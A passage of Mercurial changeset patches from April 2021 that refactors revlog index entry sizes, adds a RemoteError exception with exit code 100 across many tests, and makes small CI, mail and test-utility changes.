Bookmark and - phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to - ``1`` respectively. The number of new obsmarkers, if any, will be in - ``$HG_NEW_OBSMARKERS``, etc. + vary according the transaction type. Changes unbundled to the repository will + add ``$HG_URL`` and ``$HG_SOURCE``. New changesets will add ``$HG_NODE`` (the + ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added + changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and + ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if + any, will be in ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618425173 -7200 # Wed Apr 14 20:32:53 2021 +0200 # Node ID 92029a43debb707cc2dbbe7dd0d95d6dbb833f2b # Parent 6904a9f33b302c9d1cf3625e438cc63e8133d562 perf-discovery: use `get_unique_pull_path` This performance command now use the new API, unless the benchmarked Mercurial is older. 
Differential Revision: https://phab.mercurial-scm.org/D10423 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -915,7 +915,13 @@ """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] timer, fm = gettimer(ui, opts) - path = ui.expandpath(path) + + try: + from mercurial.utils.urlutil import get_unique_pull_path + + path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0] + except ImportError: + path = ui.expandpath(path) def s(): repos[1] = hg.peer(ui, opts, path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618145 -7200 # Mon Apr 05 12:22:25 2021 +0200 # Node ID 3c9208702db39a61f049f68dbe186acae79ee6f5 # Parent 92029a43debb707cc2dbbe7dd0d95d6dbb833f2b revlog: replace revlog._io.size with a new revlog.index.entry_size The `revlogio` class is mostly a relic from the past. Once in charge of the full revlog related Input/Output code, that class gradually lost responsibilities to the point where more IO are now done by `revlog.index` objects or revlog objects themself. I would like to ultimately remove the `revlogio` class, to do so I start simple with move the "entry size" information on the index. (The index is already responsible of the binary unpacking, so it knows the size. 
Differential Revision: https://phab.mercurial-scm.org/D10309 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -3228,7 +3228,10 @@ start = r.start length = r.length inline = r._inline - iosize = r._io.size + try: + iosize = r.index.entry_size + except AttributeError: + iosize = r._io.size buffer = util.buffer chunks = [] diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -15,6 +15,7 @@ #include <stddef.h> #include <stdlib.h> #include <string.h> +#include <structmember.h> #include "bitmanipulation.h" #include "charencode.h" @@ -2866,6 +2867,12 @@ {NULL} /* Sentinel */ }; +static PyMemberDef index_members[] = { + {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0, + "size of an index entry"}, + {NULL} /* Sentinel */ +}; + PyTypeObject HgRevlogIndex_Type = { PyVarObject_HEAD_INIT(NULL, 0) /* header */ "parsers.index", /* tp_name */ @@ -2895,7 +2902,7 @@ 0, /* tp_iter */ 0, /* tp_iternext */ index_methods, /* tp_methods */ - 0, /* tp_members */ + index_members, /* tp_members */ index_getset, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -49,11 +49,13 @@ big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent int_size = struct.calcsize(b'>i') - # Size of the entire index format - index_size = revlog_constants.INDEX_ENTRY_V1.size # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + @util.propertycache + def entry_size(self): + return self.index_format.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -116,7 +118,7 @@ data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + self.index_size] + data = 
self._data[index : index + self.entry_size] r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] @@ -125,13 +127,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % self.index_size == 0 + assert len(data) % self.entry_size == 0 self._data = data - self._lgt = len(data) // self.index_size + self._lgt = len(data) // self.entry_size self._extra = [] def _calculate_index(self, i): - return i * self.index_size + return i * self.entry_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -140,7 +142,7 @@ self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * self.index_size] + self._data = self._data[: i * self.entry_size] self._lgt = i self._extra = [] else: @@ -203,7 +205,7 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - self.index_size: + while off <= len(self._data) - self.entry_size: start = off + self.big_int_size (s,) = struct.unpack( b'>i', @@ -212,7 +214,7 @@ if lgt is not None: self._offsets[count] = off count += 1 - off += self.index_size + s + off += self.entry_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count @@ -244,7 +246,6 @@ class Index2Mixin(object): index_format = revlog_constants.INDEX_ENTRY_V2 - index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): @@ -280,7 +281,7 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - self.index_size: + while off <= len(self._data) - self.entry_size: start = off + self.big_int_size (data_size,) = struct.unpack( b'>i', @@ -293,7 +294,7 @@ if lgt is not None: self._offsets[count] = off count += 1 - off += self.index_size + data_size + side_data_size + off += self.entry_size + data_size + side_data_size if off != 
len(self._data): raise ValueError(b"corrupted data") return count diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -222,6 +222,8 @@ class revlogoldindex(list): + entry_size = INDEX_ENTRY_V0.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -273,11 +275,8 @@ class revlogoldio(object): - def __init__(self): - self.size = INDEX_ENTRY_V0.size - def parseindex(self, data, inline): - s = self.size + s = INDEX_ENTRY_V0.size index = [] nodemap = nodemaputil.NodeMap({nullid: nullrev}) n = off = 0 @@ -334,9 +333,6 @@ class revlogio(object): - def __init__(self): - self.size = INDEX_ENTRY_V1.size - def parseindex(self, data, inline): # call the C implementation to parse the index data index, cache = parsers.parse_index2(data, inline) @@ -350,9 +346,6 @@ class revlogv2io(object): - def __init__(self): - self.size = INDEX_ENTRY_V2.size - def parseindex(self, data, inline): index, cache = parsers.parse_index2(data, inline, revlogv2=True) return index, cache @@ -1716,8 +1709,8 @@ end = int(iend[0] >> 16) + iend[1] if self._inline: - start += (startrev + 1) * self._io.size - end += (endrev + 1) * self._io.size + start += (startrev + 1) * self.index.entry_size + end += (endrev + 1) * self.index.entry_size length = end - start return start, self._getsegment(start, length, df=df) @@ -1751,7 +1744,7 @@ start = self.start length = self.length inline = self._inline - iosize = self._io.size + iosize = self.index.entry_size buffer = util.buffer l = [] @@ -1979,7 +1972,7 @@ sidedata_size = index_entry[9] if self._inline: - sidedata_offset += self._io.size * (1 + rev) + sidedata_offset += self.index.entry_size * (1 + rev) if sidedata_size == 0: return {} @@ -2079,7 +2072,7 @@ # the temp file replace the real index when we exit the context # manager - tr.replace(self.indexfile, trindex * self._io.size) + tr.replace(self.indexfile, trindex * self.index.entry_size) 
nodemaputil.setup_persistent_nodemap(tr, self) self._chunkclear() @@ -2335,12 +2328,12 @@ # offset is "as if" it were in the .d file, so we need to add on # the size of the entry metadata. self._concurrencychecker( - ifh, self.indexfile, offset + curr * self._io.size + ifh, self.indexfile, offset + curr * self.index.entry_size ) else: # Entries in the .i are a consistent size. self._concurrencychecker( - ifh, self.indexfile, curr * self._io.size + ifh, self.indexfile, curr * self.index.entry_size ) self._concurrencychecker(dfh, self.datafile, offset) @@ -2464,7 +2457,7 @@ dfh.write(sidedata) ifh.write(entry) else: - offset += curr * self._io.size + offset += curr * self.index.entry_size transaction.add(self.indexfile, offset) ifh.write(entry) ifh.write(data[0]) @@ -2502,7 +2495,7 @@ if r: end = self.end(r - 1) ifh = self._indexfp(b"a+") - isize = r * self._io.size + isize = r * self.index.entry_size if self._inline: transaction.add(self.indexfile, end + isize) dfh = None @@ -2658,9 +2651,9 @@ end = self.start(rev) if not self._inline: transaction.add(self.datafile, end) - end = rev * self._io.size + end = rev * self.index.entry_size else: - end += rev * self._io.size + end += rev * self.index.entry_size transaction.add(self.indexfile, end) @@ -2699,7 +2692,7 @@ f.seek(0, io.SEEK_END) actual = f.tell() f.close() - s = self._io.size + s = self.index.entry_size i = max(0, actual // s) di = actual - (i * s) if self._inline: @@ -3241,7 +3234,7 @@ # rewrite the new index entries with self._indexfp(b'w+') as fp: - fp.seek(startrev * self._io.size) + fp.seek(startrev * self.index.entry_size) for i, entry in enumerate(new_entries): rev = startrev + i self.index.replace_sidedata_info(rev, entry[8], entry[9]) diff --git a/rust/hg-cpython/src/revlog.rs b/rust/hg-cpython/src/revlog.rs --- a/rust/hg-cpython/src/revlog.rs +++ b/rust/hg-cpython/src/revlog.rs @@ -12,8 +12,8 @@ use cpython::{ buffer::{Element, PyBuffer}, exc::{IndexError, ValueError}, - ObjectProtocol, PyBytes, 
PyClone, PyDict, PyErr, PyModule, PyObject, - PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, + ObjectProtocol, PyBytes, PyClone, PyDict, PyErr, PyInt, PyModule, + PyObject, PyResult, PyString, PyTuple, Python, PythonObject, ToPyObject, }; use hg::{ nodemap::{Block, NodeMapError, NodeTree}, @@ -285,6 +285,10 @@ self.inner_update_nodemap_data(py, docket, nm_data) } + @property + def entry_size(&self) -> PyResult<PyInt> { + self.cindex(py).borrow().inner().getattr(py, "entry_size")?.extract::<PyInt>(py) + } }); # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618854555 25200 # Mon Apr 19 10:49:15 2021 -0700 # Node ID 14ddb1dca2c012da0f753caacee4ed48b8afd954 # Parent 3c9208702db39a61f049f68dbe186acae79ee6f5 errors: make OutOfBandError extend Abort I'm about to create a new `RemoteError` exception and make `OutOfBandError` extend it. This patch prepares for that. Differential Revision: https://phab.mercurial-scm.org/D10465 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -304,10 +304,19 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Hint, Exception): +class OutOfBandError(Abort): """Exception raised when a remote repo reports failure""" - __bytes__ = _tobytes + def __init__(self, *messages, **kwargs): + from .i18n import _ + + if messages: + message = _(b"remote error:\n%s") % b''.join(messages) + # Abort.format() adds a trailing newline + message = message.rstrip(b'\n') + else: + message = _(b"remote error") + super(OutOfBandError, self).__init__(message, **kwargs) class ParseError(Abort): diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -181,17 +181,6 @@ encoding.strtolocal(inst.strerror), ) ) - except error.OutOfBandError as inst: - detailed_exit_code = 100 - if inst.args: - msg = _(b"abort: remote error:\n") - else: - msg = _(b"abort: remote error\n") - ui.error(msg) - if 
inst.args: - ui.error(b''.join(inst.args)) - if inst.hint: - ui.error(b'(%s)\n' % inst.hint) except error.RepoError as inst: ui.error(_(b"abort: %s\n") % inst) if inst.hint: @@ -233,6 +222,8 @@ detailed_exit_code = 30 elif isinstance(inst, error.HookAbort): detailed_exit_code = 40 + elif isinstance(inst, error.OutOfBandError): + detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 elif isinstance(inst, error.CanceledError): # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618850221 25200 # Mon Apr 19 09:37:01 2021 -0700 # Node ID f9482db16cef127a7900b67e8d160263373855af # Parent 14ddb1dca2c012da0f753caacee4ed48b8afd954 errors: introduce a class for remote errors Having an exception for remote errors makes it much easier to exit with the right detailed exit code. Differential Revision: https://phab.mercurial-scm.org/D10466 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -304,7 +304,11 @@ Abort.__init__(self, _(b'response expected')) -class OutOfBandError(Abort): +class RemoteError(Abort): + """Exception raised when interacting with a remote repo fails""" + + +class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" def __init__(self, *messages, **kwargs): diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -222,7 +222,7 @@ detailed_exit_code = 30 elif isinstance(inst, error.HookAbort): detailed_exit_code = 40 - elif isinstance(inst, error.OutOfBandError): + elif isinstance(inst, error.RemoteError): detailed_exit_code = 100 elif isinstance(inst, error.SecurityError): detailed_exit_code = 150 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618861943 25200 # Mon Apr 19 12:52:23 2021 -0700 # Node ID 3f87d2af0bd686bd076912d42520b51f139186f9 # Parent f9482db16cef127a7900b67e8d160263373855af errors: raise 
RemoteError in some places in exchange.py This is part of https://www.mercurial-scm.org/wiki/ErrorCategoriesPlan Differential Revision: https://phab.mercurial-scm.org/D10467 diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -1147,19 +1147,19 @@ }, ).result() except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) try: trgetter = None if pushback: trgetter = pushop.trmanager.transaction op = bundle2.processbundle(pushop.repo, reply, trgetter) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) except bundle2.AbortFromPart as exc: pushop.ui.error(_(b'remote: %s\n') % exc) if exc.hint is not None: pushop.ui.error(_(b'remote: %s\n') % (b'(%s)' % exc.hint)) - raise error.Abort(_(b'push failed on remote')) + raise error.RemoteError(_(b'push failed on remote')) except error.PushkeyFailed as exc: partid = int(exc.partid) if partid not in pushop.pkfailcb: @@ -1875,9 +1875,9 @@ bundle2.processbundle(pullop.repo, bundle, op=op) except bundle2.AbortFromPart as exc: pullop.repo.ui.error(_(b'remote: abort: %s\n') % exc) - raise error.Abort(_(b'pull failed on remote'), hint=exc.hint) + raise error.RemoteError(_(b'pull failed on remote'), hint=exc.hint) except error.BundleValueError as exc: - raise error.Abort(_(b'missing support for %s') % exc) + raise error.RemoteError(_(b'missing support for %s') % exc) if pullop.fetch: pullop.cgresult = bundle2.combinechangegroupresults(op) diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -1217,7 +1217,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1257,7 +1257,7 @@ no changes found remote: 
prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1334,7 +1334,7 @@ no changes found remote: prepushkey.no-bm-move hook exited with status 1 abort: push failed on remote - [255] + [100] #endif -- test for pushing bookmarks pointing to secret changesets diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -548,7 +548,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -556,7 +556,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] Doing the actual push: unknown mandatory parts @@ -570,19 +570,19 @@ pushing to other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes abort: missing support for test:unknown - [255] + [100] Doing the actual push: race @@ -653,7 +653,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -668,7 +668,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] (check that no 'pending' files remain) @@ -712,7 +712,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ 
-725,7 +725,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check output capture control. @@ -760,7 +760,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -773,7 +773,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check abort from mandatory pushkey @@ -950,7 +950,7 @@ searching for changes remote: Lock should not be taken abort: push failed on remote - [255] + [100] $ cat >> ../lazylock/.hg/hgrc <<EOF > [experimental] diff --git a/tests/test-bundle2-remote-changegroup.t b/tests/test-bundle2-remote-changegroup.t --- a/tests/test-bundle2-remote-changegroup.t +++ b/tests/test-bundle2-remote-changegroup.t @@ -542,7 +542,7 @@ searching for changes remote: remote-changegroup abort: missing support for remote-changegroup - digest:foo - [255] + [100] Missing digest diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -408,7 +408,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] Local stream clone with secrets involved (This is just a test over behavior: if you have access to the repo's files, @@ -629,7 +629,7 @@ streaming all changes remote: abort: server has obsolescence markers, but client cannot receive them via stream clone abort: pull failed on remote - [255] + [100] $ killdaemons.py diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -505,7 +505,7 @@ requesting all changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] $ 
cat error.log disable pull-based clones @@ -517,7 +517,7 @@ remote: abort: server has pull-based clones disabled abort: pull failed on remote (remove --pull if specified or upgrade Mercurial) - [255] + [100] #if no-reposimplestore ... but keep stream clones working diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -293,7 +293,7 @@ requesting all changes remote: abort: no common changegroup version abort: pull failed on remote - [255] + [100] $ grep 'lfs' $TESTTMP/client4_pull/.hg/requires $SERVER_REQUIRES $TESTTMP/server/.hg/requires:lfs diff --git a/tests/test-narrow-clone-stream.t b/tests/test-narrow-clone-stream.t --- a/tests/test-narrow-clone-stream.t +++ b/tests/test-narrow-clone-stream.t @@ -39,7 +39,7 @@ streaming all changes remote: abort: server does not support narrow stream clones abort: pull failed on remote - [255] + [100] Enable stream clone on the server diff --git a/tests/test-narrow-pull.t b/tests/test-narrow-pull.t --- a/tests/test-narrow-pull.t +++ b/tests/test-narrow-pull.t @@ -151,4 +151,4 @@ transaction abort! 
rollback completed abort: pull failed on remote - [255] + [100] diff --git a/tests/test-narrow-shallow.t b/tests/test-narrow-shallow.t --- a/tests/test-narrow-shallow.t +++ b/tests/test-narrow-shallow.t @@ -110,9 +110,9 @@ requesting all changes remote: abort: depth must be positive, got 0 abort: pull failed on remote - [255] + [100] $ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1 requesting all changes remote: abort: depth must be positive, got -1 abort: pull failed on remote - [255] + [100] diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -95,7 +95,7 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - [255] + [100] # getbundle full clone diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -89,7 +89,7 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes - [255] + [100] $ cat $TEMP_STDERR remote: abort: Cannot clone from a shallow repo to a full repo. 
abort: pull failed on remote diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -487,7 +487,7 @@ remote: Permission denied remote: pretxnopen.hg-ssh hook failed abort: push failed on remote - [255] + [100] $ cd $TESTTMP @@ -681,7 +681,7 @@ remote: rollback completed remote: pretxnchangegroup.fail hook failed abort: push failed on remote - [255] + [100] abort during pull is properly reported as such @@ -696,7 +696,7 @@ searching for changes remote: abort: this is an exercise abort: pull failed on remote - [255] + [100] abort with no error hint when there is a ssh problem when pulling # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618876425 25200 # Mon Apr 19 16:53:45 2021 -0700 # Node ID dc8976cc3a6ed4ddb89ade34144a28ceb59864be # Parent 3f87d2af0bd686bd076912d42520b51f139186f9 tests: make test-archive.t pass on py3.9 (issue6504) Something got stricter at parsing URL query parameters and now the parameters need to be separated by "&"; ";" is no longer allowed. See issue6504 for details. 
Differential Revision: https://phab.mercurial-scm.org/D10472 diff --git a/tests/test-archive.t b/tests/test-archive.t --- a/tests/test-archive.t +++ b/tests/test-archive.t @@ -334,10 +334,10 @@ > pass > if len(sys.argv) <= 3: > node, archive = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive) + > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive) > else: > node, archive, file = sys.argv[1:] - > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file) + > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file) > try: > stdout = sys.stdout.buffer > except AttributeError: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618823051 -7200 # Mon Apr 19 11:04:11 2021 +0200 # Node ID 66cc5f867ddccbb685a45b450d475e2b867b5f61 # Parent dc8976cc3a6ed4ddb89ade34144a28ceb59864be phab-refresh: extract the comment in a variable This make the script more readable and it is about to become more complex. Differential Revision: https://phab.mercurial-scm.org/D10463 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -51,8 +51,10 @@ phabricator-refresh: stage: phabricator + variables: + DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" script: - - "./contrib/phab-refresh-stack.sh --comment \":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\"" + - "./contrib/phab-refresh-stack.sh --comment \"$DEFAULT_COMMENT\"" test-py2: <<: *runtests # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618823416 -7200 # Mon Apr 19 11:10:16 2021 +0200 # Node ID 75351b8b20821514f59c9cee9bf557e6de7589ea # Parent 66cc5f867ddccbb685a45b450d475e2b867b5f61 phab-refresh: use a special comment on the stable branch Phabricator make it hard to spot the branch information. 
As a result patch intended for stable are consistently queued for default. We add a special command and flashy GIF to try to attract reviewer attention on the fact patch are intended for stable. Differential Revision: https://phab.mercurial-scm.org/D10464 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -53,8 +53,14 @@ stage: phabricator variables: DEFAULT_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)" + STABLE_COMMENT: ":white_check_mark: refresh by Heptapod after a successful CI run (:octopus: :green_heart:)\n⚠ This patch is intended for stable ⚠\n{image https://media.giphy.com/media/nYI8SmmChYXK0/source.gif}" script: - - "./contrib/phab-refresh-stack.sh --comment \"$DEFAULT_COMMENT\"" + - | + if [ `hg branch` == "stable" ]; then + ./contrib/phab-refresh-stack.sh --comment "$STABLE_COMMENT"; + else + ./contrib/phab-refresh-stack.sh --comment "$DEFAULT_COMMENT"; + fi test-py2: <<: *runtests # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1618893084 25200 # Mon Apr 19 21:31:24 2021 -0700 # Node ID abd18d6306f15da1d386dd1fbe704b0f66c64f77 # Parent 75351b8b20821514f59c9cee9bf557e6de7589ea errors: remove unnecessary varargs handling from OutOfBandError In my recent D10465, I moved some code over from scmutil into `OutOfBandError.__init__`. The code was written to deal with an arbitrary number of `message` arguments to the constructor. It turns out that we only ever pass 0 or 1. Given that, let's simplify it. 
Differential Revision: https://phab.mercurial-scm.org/D10483 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -311,16 +311,15 @@ class OutOfBandError(RemoteError): """Exception raised when a remote repo reports failure""" - def __init__(self, *messages, **kwargs): + def __init__(self, message=None, hint=None): from .i18n import _ - if messages: - message = _(b"remote error:\n%s") % b''.join(messages) + if message: # Abort.format() adds a trailing newline - message = message.rstrip(b'\n') + message = _(b"remote error:\n%s") % message.rstrip(b'\n') else: message = _(b"remote error") - super(OutOfBandError, self).__init__(message, **kwargs) + super(OutOfBandError, self).__init__(message, hint=hint) class ParseError(Abort): # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618892636 14400 # Tue Apr 20 00:23:56 2021 -0400 # Node ID d467bae86b2d03758d6a9efbf2613660e56fa924 # Parent abd18d6306f15da1d386dd1fbe704b0f66c64f77 mail: use a context manager when writing to mbox Differential Revision: https://phab.mercurial-scm.org/D10484 diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -208,17 +208,16 @@ def _mbox(mbox, sender, recipients, msg): '''write mails to mbox''' - fp = open(mbox, b'ab+') - # Should be time.asctime(), but Windows prints 2-characters day - # of month instead of one. Make them print the same thing. - date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) - fp.write( - b'From %s %s\n' - % (encoding.strtolocal(sender), encoding.strtolocal(date)) - ) - fp.write(msg) - fp.write(b'\n\n') - fp.close() + with open(mbox, b'ab+') as fp: + # Should be time.asctime(), but Windows prints 2-characters day + # of month instead of one. Make them print the same thing. 
+ date = time.strftime('%a %b %d %H:%M:%S %Y', time.localtime()) + fp.write( + b'From %s %s\n' + % (encoding.strtolocal(sender), encoding.strtolocal(date)) + ) + fp.write(msg) + fp.write(b'\n\n') def connect(ui, mbox=None): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852158 -7200 # Mon Apr 19 19:09:18 2021 +0200 # Node ID e38718838808f03dea5eb7aeb14070b1ae3cc10a # Parent d467bae86b2d03758d6a9efbf2613660e56fa924 streamclone: check the errors log in tests Code can be buggy, in that case having error message tend to help. Differential Revision: https://phab.mercurial-scm.org/D10475 diff --git a/tests/test-clone-uncompressed.t b/tests/test-clone-uncompressed.t --- a/tests/test-clone-uncompressed.t +++ b/tests/test-clone-uncompressed.t @@ -169,7 +169,7 @@ $ killdaemons.py $ cd server - $ hg serve -p $HGPORT -d --pid-file=hg.pid + $ hg serve -p $HGPORT -d --pid-file=hg.pid --error errors.txt $ cat hg.pid > $DAEMON_PIDS $ cd .. @@ -184,6 +184,7 @@ transferred 93.5 KB in * seconds (* */sec) (glob) (zstd !) 
searching for changes no changes found + $ cat server/errors.txt #endif #if stream-bundle2 $ hg clone --stream -U http://localhost:$HGPORT clone1 @@ -205,6 +206,7 @@ rbc-revs-v1 tags2 tags2-served + $ cat server/errors.txt #endif getbundle requests with stream=1 are uncompressed # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852218 -7200 # Mon Apr 19 19:10:18 2021 +0200 # Node ID 99c629101b738ae88dc5c7ac1b74c60dd75d9efd # Parent e38718838808f03dea5eb7aeb14070b1ae3cc10a testing: add a utility function to wait for file create This is similar to `tests/testlib/wait-on-file`, but for the python code Differential Revision: https://phab.mercurial-scm.org/D10476 diff --git a/mercurial/testing/__init__.py b/mercurial/testing/__init__.py --- a/mercurial/testing/__init__.py +++ b/mercurial/testing/__init__.py @@ -0,0 +1,30 @@ +from __future__ import ( + absolute_import, + division, +) + +import os +import time + + +# work around check-code complains +# +# This is a simple log level module doing simple test related work, we can't +# import more things, and we do not need it. +environ = getattr(os, 'environ') + + +def _timeout_factor(): + """return the current modification to timeout""" + default = int(environ.get('HGTEST_TIMEOUT_DEFAULT', 1)) + current = int(environ.get('HGTEST_TIMEOUT', default)) + return current / float(default) + + +def wait_file(path, timeout=10): + timeout *= _timeout_factor() + start = time.time() + while not os.path.exists(path): + if time.time() - start > timeout: + raise RuntimeError(b"timed out waiting for file: %s" % path) + time.sleep(0.01) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618852249 -7200 # Mon Apr 19 19:10:49 2021 +0200 # Node ID 52cee44aa1a073fa34b79c7b03eea53e2a803169 # Parent 99c629101b738ae88dc5c7ac1b74c60dd75d9efd testing: add a `write_file` function The function is 